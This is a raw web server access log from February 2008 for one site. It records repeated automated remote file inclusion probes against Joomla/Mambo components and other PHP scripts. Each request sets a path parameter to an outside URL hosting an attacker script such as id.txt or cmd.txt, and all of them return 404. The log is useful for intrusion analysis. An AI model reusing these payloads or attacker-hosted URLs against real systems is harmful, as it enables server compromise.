62.112.140.125 - - [19/Feb/2008:05:30:00 -0800] "GET /logs/access_080131.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.112.140.125 - - [19/Feb/2008:05:30:00 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:30:37 -0800] "GET /logs/access_071224.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:30:39 -0800] "GET /logs/access_071224.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:31:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:05:31:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:05:31:38 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
89.97.0.11 - - [19/Feb/2008:05:31:38 -0800] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:05:32:16 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://oliveyoursenses.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.237.64.193 - - [19/Feb/2008:05:32:31 -0800] "GET /logs/access.log//access_log.4/modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt??http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [19/Feb/2008:05:32:31 -0800] "GET //access_log.4/modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt??http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
218.237.64.193 - - [19/Feb/2008:05:32:32 -0800] "GET /logs//access_log.4/modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt??http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:40 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:41 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:41 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:42 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:42 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:42 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
218.237.64.193 - - [19/Feb/2008:05:32:47 -0800] "GET /logs/access_071225.log//access_log.4/modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt??http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:47 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:48 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:32:48 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:05:32:54 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:33:10 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:33:10 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:33:11 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.193.204.60 - - [19/Feb/2008:05:33:19 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
62.193.204.60 - - [19/Feb/2008:05:33:19 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:33:26 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:33:26 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:33:26 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.45.244.210 - - [19/Feb/2008:05:34:12 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.preciousland.co.uk/templates/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [19/Feb/2008:05:34:12 -0800] "GET //skin/zero_vote/error.php?dir=http://www.preciousland.co.uk/templates/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [19/Feb/2008:05:34:12 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.preciousland.co.uk/templates/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:34:14 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:34:19 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:34:29 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:34:38 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.173.131 - - [19/Feb/2008:05:34:42 -0800] "GET //bbs//skin/zero_vote/error.php?dir=http://h1.ripway.com/ningkelle/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:05:34:42 -0800] "GET /logs/access_080121.log//components/com_minibb.php?absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:05:34:42 -0800] "GET //components/com_minibb.php?absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:05:34:43 -0800] "GET /logs//components/com_minibb.php?absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:05:35:22 -0800] "GET /logs/access_080117.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://oliveyoursenses.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.244.210 - - [19/Feb/2008:05:36:00 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.preciousland.co.uk/templates/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:36:17 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:36:18 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:36:18 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:36:19 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:36:19 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:08 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:14 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:14 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:21 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:27 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:27 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:27 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:31 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:31 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:32 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:33 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:33 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:33 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:33 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:33 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:33 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:34 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:34 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:34 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:37:47 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:38:24 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:38:24 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:38:24 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:38:35 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:38:36 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:38:59 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:38:59 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:38:59 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:39:03 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:05:39:04 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:08 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:08 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:09 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:09 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:09 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:09 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:19 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:19 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.52.210 - - [19/Feb/2008:05:39:20 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.191.28.10 - - [19/Feb/2008:05:40:11 -0800] "GET //include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.191.28.10 - - [19/Feb/2008:05:40:12 -0800] "GET /logs//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
208.16.236.69 - - [19/Feb/2008:05:40:22 -0800] "GET /index.php?body=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:40:55 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:05:41:32 -0800] "GET /logs/access_080118.log//components/com_minibb.php?absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:05:41:57 -0800] "GET //components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:05:41:57 -0800] "GET /logs//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:05:41:58 -0800] "GET /logs//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.8.154.215 - - [19/Feb/2008:05:41:58 -0800] "GET //components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cnim.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:42:30 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:42:30 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:42:30 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [19/Feb/2008:05:42:36 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:42:40 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:42:40 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:42:40 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:42:47 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:05:42:51 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
